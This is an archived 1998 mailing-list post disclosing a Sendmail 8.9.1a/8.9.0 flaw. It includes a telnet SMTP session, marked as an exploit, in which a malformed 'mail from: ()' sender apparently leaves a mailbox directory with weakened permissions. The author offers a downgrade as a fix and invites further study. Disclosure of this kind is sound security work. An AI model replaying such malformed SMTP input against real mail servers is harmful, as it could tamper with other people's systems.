(no subject)

From: Simon Smith (simonat_private)
Date: Thu Sep 24 1998 - 07:14:06 PDT

Next message: Joel Moses: "Security Dynamics PinPAD problem?"

Previous message: marcat_private: "BSDI 3.1 and 4.0 OFFICIAL mods"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is not the same attack as the last one regarding the "(".
This one does not make your system hang but rather alters permissions is
seems.  If this was already posted please disregard it.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Be conscious that Sendmail 8.9.1a/8.9.0 has a critical security
flaw in it.  I have tested this on debain Linux.  I have not had time to
hack the source and find out where the hole is. (Yes I am going to give
notice to sendmail.)  I have not determined if other systems are open to
this attack, but  to check, create a user that you can eliminate.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

begin exploit

*****
bogin:~$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 host.com ESMTP Sendmail 8.9.1a/8.9.0; Thu, 24 Sep 1998 09:44:23 -0400
mail from: ()
250 MAILER-DAEMON... Sender ok
rcpt to: tester
250 tester... Recipient ok
data
354 Enter mail, end with "." on a line by itself
bababababa
.250 JAA15070 Message accepted for delivery
quit
221 bogin.ma.ultranet.com closing connection
Connection closed by foreign host.
bogin:~$ su - tester
Password:
bogin:~$ pine
*****

end exploit

That is not the least of it.  The mail was sent to tester, but watch what
happens if I read the mail,
then use pine to check e-mail.

I get the following message inside of pine:
"Mailbox vulnerable - directory must have 1777 protection "

Down grading to an preliminary version of sendmail will stop this from
happening to you (8.8.8). If someone was to transmit mail to
allat_private you would be condemned.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=




Hmmm it was not like that before.

I am still able to read the email..  but this causes problems..


I apologize that I did not take this any farther.  If anyone wants to dig
into this please notify me of your findings


Sincerely,
        SIMON

p.s. if this is an old bug please tell me and forward me the details...
not sure how it could be though seing as it is the alpha release....  =oP

Next message: Joel Moses: "Security Dynamics PinPAD problem?"
Previous message: marcat_private: "BSDI 3.1 and 4.0 OFFICIAL mods"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:17:32 PDT